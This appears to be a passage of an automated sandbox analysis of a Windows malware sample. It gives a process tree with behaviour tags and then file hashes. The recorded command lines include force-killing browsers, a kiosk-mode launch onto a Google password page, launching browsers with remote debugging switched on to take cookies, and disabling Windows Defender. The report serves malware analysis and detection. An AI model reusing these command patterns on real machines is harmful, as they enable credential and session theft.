                              • C:\Users\Admin\AppData\Local\Temp\0F49D2ABOTI6D55J31ZZZ7.exe
                                "C:\Users\Admin\AppData\Local\Temp\0F49D2ABOTI6D55J31ZZZ7.exe"
                                6⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                PID:2396
                            • C:\Users\Admin\AppData\Local\Temp\10232530101\84f585a84f.exe
                              "C:\Users\Admin\AppData\Local\Temp\10232530101\84f585a84f.exe"
                              5⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              PID:4752
                            • C:\Users\Admin\AppData\Local\Temp\10232540101\0982cdebf5.exe
                              "C:\Users\Admin\AppData\Local\Temp\10232540101\0982cdebf5.exe"
                              5⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:4516
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM firefox.exe /T
                                6⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4260
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM chrome.exe /T
                                6⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1240
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM msedge.exe /T
                                6⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3388
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM opera.exe /T
                                6⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2340
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM brave.exe /T
                                6⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2276
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                6⤵
                                  PID:1496
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                    7⤵
                                    • Drops desktop.ini file(s)
                                    • Checks processor information in registry
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    • Suspicious use of SetWindowsHookEx
                                    PID:1932
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2032 -prefsLen 27099 -prefMapHandle 2036 -prefMapSize 270279 -ipcHandle 2112 -initialChannelId {b802ae4a-7e18-4075-a5a5-33958d46d85e} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                      8⤵
                                        PID:5548
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2516 -prefsLen 27135 -prefMapHandle 2520 -prefMapSize 270279 -ipcHandle 2528 -initialChannelId {8f698dca-d001-4816-be45-b0bf019547f9} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                        8⤵
                                          PID:3864
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3828 -prefsLen 25164 -prefMapHandle 3832 -prefMapSize 270279 -jsInitHandle 3836 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3844 -initialChannelId {7fb01fd3-ba47-4256-9720-b5c815baf4f8} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                          8⤵
                                          • Checks processor information in registry
                                          PID:3484
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4028 -prefsLen 27276 -prefMapHandle 4032 -prefMapSize 270279 -ipcHandle 4100 -initialChannelId {953c7db1-e61c-4650-a683-e26f25306964} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                          8⤵
                                            PID:5704
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3116 -prefsLen 34775 -prefMapHandle 3268 -prefMapSize 270279 -jsInitHandle 3272 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3132 -initialChannelId {7e310782-3a74-41ca-8946-e48d91ac75de} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                            8⤵
                                            • Checks processor information in registry
                                            PID:4916
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5136 -prefsLen 35012 -prefMapHandle 5160 -prefMapSize 270279 -ipcHandle 5168 -initialChannelId {6710b37e-fae9-4eb7-a432-c91e4d28c085} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                            8⤵
                                            • Checks processor information in registry
                                            PID:7244
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5396 -prefsLen 32952 -prefMapHandle 5400 -prefMapSize 270279 -jsInitHandle 5404 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5412 -initialChannelId {b2db260d-0039-4508-ae40-d620c622951b} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                            8⤵
                                            • Checks processor information in registry
                                            PID:7452
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5472 -prefsLen 32952 -prefMapHandle 5468 -prefMapSize 270279 -jsInitHandle 5464 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2988 -initialChannelId {cafe6cb7-97fa-4b90-8df7-b156d2f8e0ff} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                            8⤵
                                            • Checks processor information in registry
                                            PID:7572
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5760 -prefsLen 32952 -prefMapHandle 5764 -prefMapSize 270279 -jsInitHandle 5768 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5776 -initialChannelId {f293f06d-e3fd-4876-8d74-2a328d635223} -parentPid 1932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                            8⤵
                                            • Checks processor information in registry
                                            PID:7584
                                    • C:\Users\Admin\AppData\Local\Temp\10232550101\baf2e63155.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10232550101\baf2e63155.exe"
                                      5⤵
                                      • Modifies Windows Defender DisableAntiSpyware settings
                                      • Modifies Windows Defender Real-time Protection settings
                                      • Modifies Windows Defender TamperProtection settings
                                      • Modifies Windows Defender notification settings
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Windows security modification
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:7188
                                    • C:\Users\Admin\AppData\Local\Temp\10232560101\affbf8475a.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10232560101\affbf8475a.exe"
                                      5⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1272
                                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exe
                                  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exe
                                  3⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Downloads MZ/PE file
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:4772
                                  • C:\Users\Admin\AppData\Local\Temp\EOQAPR57ODIFE70BDKFTZDQP.exe
                                    "C:\Users\Admin\AppData\Local\Temp\EOQAPR57ODIFE70BDKFTZDQP.exe"
                                    4⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5096
                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exe
                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exe
                                2⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Downloads MZ/PE file
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Loads dropped DLL
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Checks processor information in registry
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of WriteProcessMemory
                                PID:3380
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                  3⤵
                                  • Uses browser remote debugging
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of WriteProcessMemory
                                  PID:2560
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffe373cdcf8,0x7ffe373cdd04,0x7ffe373cdd10
                                    4⤵
                                      PID:3176
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1880,i,7738195712009056912,6966056407721748143,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1876 /prefetch:2
                                      4⤵
                                        PID:2296
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2244,i,7738195712009056912,6966056407721748143,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2260 /prefetch:3
                                        4⤵
                                          PID:1468
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,7738195712009056912,6966056407721748143,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2396 /prefetch:8
                                          4⤵
                                            PID:3544
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,7738195712009056912,6966056407721748143,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3260 /prefetch:1
                                            4⤵
                                            • Uses browser remote debugging
                                            PID:5160
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,7738195712009056912,6966056407721748143,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3316 /prefetch:1
                                            4⤵
                                            • Uses browser remote debugging
                                            PID:3068
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4280,i,7738195712009056912,6966056407721748143,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4304 /prefetch:2
                                            4⤵
                                            • Uses browser remote debugging
                                            PID:1864
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4576,i,7738195712009056912,6966056407721748143,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4668 /prefetch:1
                                            4⤵
                                            • Uses browser remote debugging
                                            PID:5892
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5268,i,7738195712009056912,6966056407721748143,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5276 /prefetch:8
                                            4⤵
                                              PID:5472
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5496,i,7738195712009056912,6966056407721748143,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5328 /prefetch:8
                                              4⤵
                                                PID:1524
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                              3⤵
                                              • Uses browser remote debugging
                                              PID:4596
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
                                                4⤵
                                                • Uses browser remote debugging
                                                • Enumerates system info in registry
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                • Suspicious use of FindShellTrayWindow
                                                PID:5504
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffe373af208,0x7ffe373af214,0x7ffe373af220
                                                  5⤵
                                                    PID:5432
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1920,i,1644276117952058688,2734003725935711082,262144 --variations-seed-version --mojo-platform-channel-handle=2256 /prefetch:3
                                                    5⤵
                                                      PID:5372
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2200,i,1644276117952058688,2734003725935711082,262144 --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:2
                                                      5⤵
                                                        PID:2612
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2632,i,1644276117952058688,2734003725935711082,262144 --variations-seed-version --mojo-platform-channel-handle=2648 /prefetch:8
                                                        5⤵
                                                          PID:4896
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3472,i,1644276117952058688,2734003725935711082,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:3952
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,1644276117952058688,2734003725935711082,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:3812
                                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                  1⤵
                                                    PID:3344
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                    1⤵
                                                      PID:1460
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                      1⤵
                                                        PID:5292
                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        1⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:4816
                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        1⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:4588
                                                      • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                                        C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        PID:4972
                                                      • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                        "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                        1⤵
                                                          PID:6272
                                                        • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                          "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                          1⤵
                                                            PID:7032

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\ProgramData\mozglue.dll

                                                            Filesize

                                                            593KB

                                                            MD5

                                                            c8fd9be83bc728cc04beffafc2907fe9

                                                            SHA1

                                                            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                            SHA256

                                                            ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                            SHA512

                                                            fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                          • C:\ProgramData\nss3.dll

                                                            Filesize

                                                            2.0MB

                                                            MD5

                                                            1cc453cdf74f31e4d913ff9c10acdde2

                                                            SHA1

                                                            6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                            SHA256

                                                            ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                            SHA512

                                                            dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                          • C:\Temp\8Gq0M3TmV.hta

                                                            Filesize

                                                            779B

                                                            MD5

                                                            39c8cd50176057af3728802964f92d49

                                                            SHA1

                                                            68fc10a10997d7ad00142fc0de393fe3500c8017

                                                            SHA256

                                                            f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                                                            SHA512

                                                            cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                            Filesize

                                                            40B

                                                            MD5

                                                            e583b3bcd0a283734268ceaab094ecf6

                                                            SHA1

                                                            31cd245bfde1e6f488730f052d6d37bbcfe470ea

                                                            SHA256

                                                            a143092cbf17b2e36e7b5e9ec5058a2154cca9ac0c2b5841855c07439ae6c509

                                                            SHA512

                                                            3168641a34bfeed7098fe87c75ab92337c94baf76d8725e295a411853381514748e71a0c4c527893a653e1a30d0cf1b540ede8ba480ca655af78cbec0b259e21

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\56bb207b-1250-45de-864e-396feeb7de74.tmp

                                                            Filesize

                                                            1B

                                                            MD5

                                                            5058f1af8388633f609cadb75a75dc9d

                                                            SHA1

                                                            3a52ce780950d4d969792a2559cd519d7ee8c727

                                                            SHA256

                                                            cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                            SHA512

                                                            0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                            Filesize

                                                            414B

                                                            MD5

                                                            34906cbe0a33b62ce1d22cdbccda8b4e

                                                            SHA1

                                                            b0a85781ea924c85b69ec509ce5e39fbb5eebbcb

                                                            SHA256

                                                            6a0f0d346a41943e629759a5539c4d11590cf3b9449e7b5cf62b750c6da0f86f

                                                            SHA512

                                                            591a49307ff23171737b4e146f15d37a705c22c106ce5697a0696a13966cbea380b101f34ec9753a5004a964d15e9f3b1478b95b83f2825049859f6f070a91ed

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                            Filesize

                                                            2B

                                                            MD5

                                                            d751713988987e9331980363e24189ce

                                                            SHA1

                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                            SHA256

                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                            SHA512

                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                            Filesize

                                                            10KB

                                                            MD5

                                                            ad271fde25a4dfb8cfd0e8cd5ebcacb4

                                                            SHA1

                                                            2be117c9e01970461092f31b0f23aaf661f27d7d

                                                            SHA256

                                                            0e8ad44e275ed64b9133d6428c26b3c7b09380d5ac407a01bcdb7a6469076290

                                                            SHA512

                                                            c20fa60e754b1fde99692c118c5e8fd9b4e5bd628a3c502651ee8922ba8cb0672227625ac058e78b98e48617f302e4f6e1c8cea35503a842de038d88595c2bfa

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                            Filesize

                                                            15KB

                                                            MD5

                                                            b96c1ed7fa9b3fd5a5e5f2dc33660b85

                                                            SHA1

                                                            104296754b341f1846caf22480143b045963e29c

                                                            SHA256

                                                            9270ac2d24d4d5f1b88369d237c9a4f8c2eb0803c2bcf90fdc46cd4021c19857

                                                            SHA512

                                                            beff75280d3071b87d9d75a982c4454a263a79ad5b65764bd598fb60fe5d1834eedd3a40adf7fa9aa11d1a42cf13419ec6d7d967606abd721f8e8f4868d4d94d

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                            Filesize

                                                            72B

                                                            MD5

                                                            509c3ba943f8a2bcd2030cdf9c25b047

                                                            SHA1

                                                            c579405ea68689b16908194fd28f93e45dd7713e

                                                            SHA256

                                                            663169fbdb78435d1f23479f9a766f44be3a18d4a94dd76b1ed05afc4745c94b

                                                            SHA512

                                                            b140c483a13e33348e0379e66a082ec3493ce8be1d1a3a71f8be75d8c01109b008ed4ed5e155b4fda644503369d9ab152b5860e0c6423d0c6ebfbbf7e10c6fa6

                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe59869b.TMP

                                                            Filesize

                                                            48B

                                                            MD5

                                                            818bc8df0bd828a6f8d3ea6d6533ce4f

                                                            SHA1

                                                            770a06e38fbd1760e0a74290d83c84ac54cc015c

                                                            SHA256

